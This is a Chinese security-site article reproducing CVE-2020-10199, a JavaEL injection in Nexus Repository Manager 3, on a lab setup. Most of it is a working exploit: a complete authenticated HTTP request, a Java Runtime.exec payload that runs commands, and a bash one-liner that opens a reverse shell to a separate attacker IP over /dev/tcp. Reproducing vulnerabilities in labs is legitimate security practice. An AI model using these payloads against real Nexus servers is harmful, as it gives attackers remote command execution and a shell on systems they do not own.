freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2020-10199-Nexus Repository Manager 3 远程命令执行漏洞复现及命令详解
2021-09-03 15:01:23

漏洞名称:CVE-2020-10199-Nexus Repository Manager 3 远程命令执行漏洞

CVE-2020-10199-Nexus Repository Manager 3 远程命令执行漏洞

漏洞编号:

CVE-2020-10199

漏洞描述:

3.21.2 之前的 Sonatype Nexus Repository 允许 JavaEL 注入

影响版本:

<3.21.2

查找方法:

直接vulhub安装

1630547853_61302f8d469b368fcf40a.png!small?1630547853626

利用的前提是有个账号来登录,这里的是:admin/admin

访问目标8081端口登录

登录后复制cookie的两个参数

1630547754_61302f2aa164363460067.png!small?1630547755086

注意NXSESSIONID过期很快

数据包如下:

POST /service/rest/beta/repositories/go/group HTTP/1.1

Host: 192.168.52.149:8081

Content-Length: 195

X-Requested-With: XMLHttpRequest

X-Nexus-UI: true

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

NX-ANTI-CSRF-TOKEN: 0.9111760285842319

Content-Type: application/json

Accept: */*

Origin: http://192.168.52.149:8081

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Referer: http://192.168.52.149:8081/

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: NX-ANTI-CSRF-TOKEN=0.9111760285842319; NXSESSIONID=36937647-d92d-4f6f-8f98-033145a32c3f

Connection: close

{

"name": "internal",

"online": true,

"storage": {

"blobStoreName": "default",

"strictContentTypeValidation": true

},

"group": {

"memberNames": ["$\\A{9*9}"]

}

}

利用方法(利用案例):

创建文件

1630547717_61302f050d7cb0c6b918f.png!small?1630547717459

''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/abc')

NC反弹shell

'/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.52.155/8080<&1'

1630547726_61302f0ec0e62545b4b7a.png!small?1630547727155

# 渗透测试 # web安全 # 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录